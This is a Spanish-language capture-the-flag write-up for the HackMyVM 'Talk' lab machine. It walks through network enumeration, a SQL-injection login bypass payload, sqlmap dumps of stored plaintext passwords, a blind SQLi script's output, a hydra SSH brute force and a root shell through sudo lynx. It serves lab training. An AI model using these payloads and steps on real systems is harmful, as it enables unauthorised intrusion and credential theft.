cd ~/blog

~/writeups/hmv/080-talk.md

080-talk

easy Linux hmv 25-08-2025
SQL Injectionsudo lynx Privesc
hackmyvm.eu/machines/machine.php?vm=Talk

~1 min de lectura


Identificamos la IP de la máquina victima:

 arp-scan --interface=wlo1 --localnet | grep PCS
192.168.1.117	08:00:27:70:fd:a1	PCS Systemtechnik GmbH

Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.117
[sudo] contraseña para wh01s17:
Starting Nmap 7.97 ( https://nmap.org ) at 2025-07-24 12:58 -0400
Nmap scan report for 192.168.1.117
Host is up (0.00019s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:70:FD:A1 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.95 seconds
 nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.117
Starting Nmap 7.97 ( https://nmap.org ) at 2025-07-24 12:58 -0400
Nmap scan report for 192.168.1.117
Host is up (0.00036s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 e3:fc:1b:74:e5:e3:c9:ef:6d:ac:df:b1:1e:47:83:ad (RSA)
|   256 10:bd:60:33:a0:d1:a4:7d:de:c8:29:0a:c4:7d:b1:aa (ECDSA)
|_  256 4b:fc:30:a8:12:69:e7:b2:ce:ad:99:f1:66:12:cd:8c (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: chatME
|_http-server-header: nginx/1.14.2
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.16 seconds

Ingresamos a http://192.168.1.117/ y nos encontramos con un login, el cual es vulnerable a SQLi, por lo que nos logueamos con el payload admin' OR 1=1-- -.

Una vez dentro, nos encontramos con un chat, por lo que mandamos un mensaje e interceptamos con burpsuite:

POST /send_message.php HTTP/1.1
Host: 192.168.1.117
Content-Length: 13
X-Requested-With: XMLHttpRequest
Accept-Language: es-419,es;q=0.9
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Origin: http://192.168.1.117
Referer: http://192.168.1.117/home.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=pabh70lknuir59i396l0c2ujjn
Connection: keep-alive

msg=fdsa&id=1

Una vez capturada la request, copiamos el resultado en un archivo con la opción "Copy to file" de burpsuite y analizamos con sqlmap:

 sqlmap -r /ruta/absoluta/a/request --threads 10 --dbs
available databases [4]:
[*] chat
[*] information_schema
[*] mysql
[*] performance_schema

 sqlmap -r /ruta/absoluta/a/request --threads 10 --tables -D chat
Database: chat
[3 tables]
+-----------+
| user      |
| chat      |
| chat_room |
+-----------+

 sqlmap -r /ruta/absoluta/a/request --dump -D chat -T user
Database: chat
Table: user
[5 entries]
+--------+-----------------+-------------+-----------------+----------+-----------+
| userid | email           | phone       | password        | username | your_name |
+--------+-----------------+-------------+-----------------+----------+-----------+
| 5      | david@david.com | 11          | adrianthebest   | david    | david     |
| 4      | jerry@jerry.com | 111         | thatsmynonapass | jerry    | jerry     |
| 2      | nona@nona.com   | 1111        | myfriendtom     | nona     | nona      |
| 1      | pao@yahoo.com   | 09123123123 | pao             | pao      | PaoPao    |
| 3      | tina@tina.com   | 11111       | davidwhatpass   | tina     | tina      |
+--------+-----------------+-------------+-----------------+----------+-----------+

También, podemos automatizar la extracción con un script en Python, para explotar Blind SQLi (Time-Based):

 python sqli-blind.py
...
[*] Extrayendo registros de `user`...
  [+] Registro 1
[+] Extrayendo: pao:pao
    -> pao:pao
  [+] Registro 2
[+] Extrayendo: nona:myfriendtom
    -> nona:myfriendtom
  [+] Registro 3
[+] Extrayendo: tina:davidwhatpass
    -> tina:davidwhatpass
  [+] Registro 4
[+] Extrayendo: jerry:thatsmynonapass
    -> jerry:thatsmynonapass
  [+] Registro 5
[+] Extrayendo: david:adrianthebest
    -> david:adrianthebest
...

Formateamos la salida en 2 wordlists, uno con users y otra con passwords, para probar con hydra:

 hydra -L users.txt -P passwds.txt 192.168.1.117 ssh -t 64
...
[22][ssh] host: 192.168.1.117   login: jerry   password: myfriendtom
[22][ssh] host: 192.168.1.117   login: nona   password: thatsmynonapass
[22][ssh] host: 192.168.1.117   login: david   password: davidwhatpass
...

Establecemos conexión con el usuario nona y obtenemos la primera flag:

 ssh nona@192.168.1.117
nona@192.168.1.117\'s password: thatsmynonapass
Linux talk 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 24 15:12:11 2025 from 192.168.1.5

nona@talk:~$

Para escalar privilegios, ejecutamos el comando sudo -l:

nona@talk:~$ sudo -l
Matching Defaults entries for nona on talk:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nona may run the following commands on talk:
    (ALL : ALL) NOPASSWD: /usr/bin/lynx

Podemos ejecutar el comando lynx como cualquier usuario y sin contraseña.

Para obtener una shell del usuario root, ejecutamos lo siguiente:

nona@talk:~$ sudo /usr/bin/lynx
! (SHIFT + 1)

Spawning your default shell.  Use 'exit' to return to Lynx.

root@talk:/home/nona#

Obtenemos nuestra siguiente flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados